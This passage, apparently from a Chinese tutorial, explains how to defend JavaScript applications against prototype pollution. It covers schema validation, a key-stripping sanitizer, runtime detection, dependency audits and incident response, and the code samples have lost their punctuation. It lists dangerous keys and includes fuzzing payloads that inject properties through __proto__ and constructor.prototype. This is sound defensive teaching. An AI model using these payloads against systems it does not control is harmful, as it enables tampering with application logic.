输入验证与数据净化永远不要信任用户输入。对于任何来自外部的数据HTTP请求参数、请求体、查询字符串、文件上传内容等在用于可能触发原型链污染的操作如对象合并、eval、动态属性访问之前必须进行严格的验证和净化。1. 结构验证使用JSON Schema等工具定义数据结构的严格契约。明确指定允许的字段名、类型和嵌套结构拒绝任何不符合契约的数据。const Ajv require(ajv); const ajv new Ajv(); const schema { type: object, properties: { theme: { type: string, enum: [light, dark] }, permissions: { type: object, properties: { read: { type: boolean }, write: { type: boolean } }, additionalProperties: false // 禁止额外属性 } }, additionalProperties: false // 禁止根级别的额外属性 }; const validate ajv.compile(schema); if (!validate(userInput)) { throw new Error(无效的输入数据); } // 只有通过验证的数据才进行后续操作2. 属性名过滤在将用户数据传入敏感函数前遍历数据的所有键名删除或拒绝包含敏感序列如__proto__、constructor、prototype的键。注意这里需要递归地检查嵌套对象。function sanitizeObject(obj) { const dangerousKeys [__proto__, constructor, prototype]; function traverse(current) { if (current typeof current object) { Object.keys(current).forEach(key { // 如果键名危险则删除 if (dangerousKeys.includes(key)) { delete current[key]; } else if (current[key] typeof current[key] object) { // 递归处理嵌套对象 traverse(current[key]); } }); } } const cloned JSON.parse(JSON.stringify(obj)); // 深拷贝避免修改原数据 traverse(cloned); return cloned; }4.3 运行时检测与监控即使采取了预防措施运行时监控也能作为最后一道防线。1. 原型污染检测脚本可以在测试环境或关键业务入口周期性地检查Object.prototype是否被添加了异常属性。// 记录初始的 Object.prototype 键名 const initialProtoKeys Object.keys(Object.prototype); function checkForPollution() { const currentKeys Object.keys(Object.prototype); const newKeys currentKeys.filter(key !initialProtoKeys.includes(key)); if (newKeys.length 0) { console.error([警报] 检测到原型链污染新增属性: ${newKeys.join(, )}); // 触发警报发送邮件、Slack消息、写入安全日志等 // 注意不要在生产环境直接 console.error应使用日志系统 } } // 定期执行例如每10分钟一次 setInterval(checkForPollution, 10 * 60 * 1000);2. 使用安全模式或沙箱对于处理高度不可信数据的代码段可以考虑在独立的上下文中运行。Node.js中可以使用vm模块创建沙箱但vm模块本身也并非绝对安全需要仔细配置。更好的选择是使用进程隔离如通过child_process.fork或容器化技术来运行不可信的代码逻辑。4.4 依赖管理与安全审计1. 自动化依赖检查将安全审计集成到开发流程中在CI/CD流水线中加入npm audit --audit-levelhigh或yarn audit发现高危漏洞则阻断构建。使用GitHub Dependabot、Snyk等工具自动创建依赖更新PR。2. 最小化依赖定期审视package.json移除不再使用的依赖。依赖越少攻击面越小。对于像lodash这样的大型库考虑是否真的需要全部功能或许可以使用lodash.merge这样的独立包或者使用更轻量的替代方案。3. 代码审查关注点在代码审查中将“对象合并操作”作为重点审查项目。审查者需要问这里合并的数据来源是否可信使用的合并函数是否安全是Object.assign还是存在漏洞的深合并是否对输入数据进行了验证和净化5. 常见问题与排查技巧实录在实际开发和应急响应中你可能会遇到各种与原型链污染相关的问题。下面是我总结的一些常见场景和排查思路。5.1 如何判断应用是否存在原型链污染漏洞代码静态分析白盒搜索关键函数在代码库中全局搜索merge、extend、assign、defaultsDeep、cloneDeep、_.merge、Object.assign等关键词。跟踪数据流对于找到的每个合并函数向上追溯其源数据source是否来自用户可控的输入如req.body、req.query、req.params、上传的文件内容、第三方API返回的不可信数据等。检查过滤逻辑查看合并函数内部或调用前是否对数据的键名进行了有效的过滤检查__proto__、constructor、prototype等。检查库版本确认使用的第三方库特别是lodash、hoek、jQuery等是否为存在已知原型污染漏洞的版本。动态测试黑盒/灰盒模糊测试Fuzzing针对接受JSON或类似结构化数据的API端点发送包含可疑键名的测试载荷。测试载荷示例{__proto__: {polluted: test}} {constructor: {prototype: {polluted: test}}} {a: {__proto__: {polluted: test}}} {a: {constructor: {prototype: {polluted: test}}}}观察响应发送测试载荷后观察应用行为是否有异常如错误日志、崩溃。同时尝试访问应用的其他功能看是否有逻辑被改变例如原本没有的权限突然有了。直接检测如果可能在测试后调用一个能返回新创建对象属性的接口检查是否出现了测试载荷中注入的属性名。5.2 发现疑似污染后如何应急处理立即隔离如果确认存在漏洞且可能被利用考虑暂时下线受影响的服务或API端点防止进一步损害。排查污染范围检查Object.prototype以及其他可能被污染的内建原型如Array.prototype、Function.prototype。使用上文提到的检测脚本列出所有新增属性。清理污染在修复漏洞根源之前可以尝试在内存中清理污染。但请注意这不能修复已被篡改的业务逻辑状态。// 删除在 Object.prototype 上新增的属性 const pollutedKeys Object.keys(Object.prototype).filter(key !initialProtoKeys.includes(key)); pollutedKeys.forEach(key delete Object.prototype[key]);警告如果攻击者污染的是已有方法如toString、valueOf直接delete可能会破坏功能可能需要从备份中恢复。根因修复升级依赖立即将存在漏洞的第三方库升级到安全版本。修复代码如果漏洞存在于自身代码中用安全的合并函数替换不安全的函数并添加强制的输入验证。回溯与审计查看日志尝试确定攻击发生的时间、来源和具体载荷。审计在污染发生期间是否有敏感操作被执行。5.3 使用Object.create(null)能完全免疫吗这是一个常见的误解。Object.create(null)会创建一个没有原型即[[Prototype]]为null的对象。这个对象本身确实不会受到Object.prototype污染的影响因为它根本不继承自Object.prototype。const pureObject Object.create(null); pureObject.a 1; console.log(pureObject.toString); // undefined // 即使 Object.prototype 被污染pureObject 也不会受到影响但是这并不能提供完全免疫污染依然存在Object.prototype仍然被污染了应用中其他成千上万的普通对象{}依然会受影响。库函数内部可能创建普通对象即使你传入Object.create(null)的对象给一个库函数该函数内部可能仍然会使用{}字面量创建新对象这些新对象会被污染。污染可以发生在其他原型上攻击者可能污染Array.prototype、Function.prototype或者某个特定构造函数的原型。Object.create(null)只对Object.prototype免疫。因此Object.create(null)是一种有用的防御性编码实践特别是在创建用作字典键值对的对象时可以避免与原型上的属性名冲突并免疫基于Object.prototype的污染。但它不是解决原型链污染漏洞的银弹必须与输入验证、安全合并等主要手段结合使用。5.4 现代前端框架React, Vue是否受影响现代前端框架本身的设计在一定程度上降低了风险但风险并未消失。ReactReact组件的状态state和属性props的管理相对封闭通常不涉及直接使用易受攻击的深合并函数去合并不可信数据。但是如果在处理state或与全局状态管理库如Redux交互时不慎使用了不安全的_.merge来合并来自API响应的数据风险依然存在。Redux的reducer中应使用纯函数和不可变更新避免直接修改或深度合并状态。VueVue 2.x的Vue.set和Vue.util.extend以及Vue 3的响应式系统内部对数据操作有一定封装。但开发者如果在data函数、computed属性或方法中手动执行不安全的对象合并操作同样会引入漏洞。特别是在处理Vuex的state更新时需要注意。核心原则不变无论使用什么框架只要你的JavaScript代码执行了“将不可信数据深度合并到一个对象中”这个操作并且没有进行正确的防护原型链污染的风险就存在。框架只是提供了不同的数据管理范式并不能自动消除这类底层语言特性导致的安全问题。在前端污染的影响可能包括破坏其他组件的渲染逻辑、触发意外的生命周期钩子、或与第三方库发生冲突。
![3分钟搞定:Calibre繁简中文转换插件终极使用指南 [特殊字符]](http://pic.xiahunao.cn/yaotu/3分钟搞定:Calibre繁简中文转换插件终极使用指南 [特殊字符])
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-字符串变换最小次数[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-内存资源分配[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)
